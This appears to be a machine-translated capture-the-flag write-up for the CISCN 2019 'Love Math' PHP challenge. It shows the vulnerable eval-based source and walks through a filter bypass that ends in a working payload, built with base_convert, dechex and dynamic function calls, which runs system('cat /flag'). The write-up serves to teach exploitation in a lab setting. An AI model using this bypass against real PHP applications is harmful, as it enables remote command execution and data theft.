buuctf-[CISCN 2019 Preliminaries ]Love Math（ Xiaoyute detailed explanation ）

1. First look at the topic

<?php
error_reporting(0);
// I heard that you like math very much , I don't know if you love it better than love flag
if(!isset($_GET['c'])){ 
    
    show_source(__FILE__);
}else{ 
    
    // Example  c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) { 
    
        die(" Too long doesn't count ");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) { 
    
        if (preg_match('/' . $blackitem . '/m', $content)) { 
    
            die(" Please don't type strange characters ");
        }
    }
    // Common mathematical functions http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) { 
    
        if (!in_array($func, $whitelist)) { 
    
            die(" Please don't enter strange functions ");
        }
    }
    // Help you figure out the answer 
    eval('echo '.$content.';');
} 

Analyze the source code

At first, it limits the length of the incoming parameters , Then there is blacklist filtering , Finally, the white list , The white list here is a commonly used mathematical function .

Here's the idea

1. First pass in a parameter , See if you can execute the command

payload：/?c=19-1

2. Then the blacklist filters a lot of things , The conventional cat/flag Can't use , Here is a knowledge point is php Function name can be passed to a variable by string in , Then call the function dynamically through this variable. For example, the following code will execute system(‘cat/flag’);

$a='system';
$a('cat/flag');

The parameters used here are

?c=($_GET[a])($_GET[b])&a=system&b=cat /flag

But here _GET and a,b None of them are on the white list , It needs to be replaced here

After replacement

?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag

But here _GET There is no direct replacement , and [] Also filtered by the blacklist

Here we need to know about the functions in the white list he gave

Here are some functions that need to be used

First of all, I will _GET Function to convert

hex2bin() function

hex2bin() Function to convert a string of hexadecimal values to ASCII character .

there _GET yes ASCII character , Use online tools to _GET Convert to hex

hex2bin(5f 47 45 54) Namely _GET, however hex2bin() Functions are not in the white list , And here's 5f 47 45 54 You can't directly fill in , It's going to be destroyed here

 preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  

To test the white list .

there hex2bin() Functions can be base_convert() Function to convert

base_convert() The function can convert numbers between any base numbers

there hex2bin You can view it as 36 Base number , use base_convert To convert 10 The base number is converted to 16 Base can appear hex2bin

hex2bin=base_convert(37907361743,10,36)

And then the inside 5f 47 45 54 Use dechex() Function will 10 The base number is converted to 16 Binary number

dechex(1598506324),1598506324 Convert to 16 Hexadecimal is 5f 47 45 54

The final payload：

/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){ 
    pi}(($$pi){ 
    abs})&pi=system&abs=cat /flag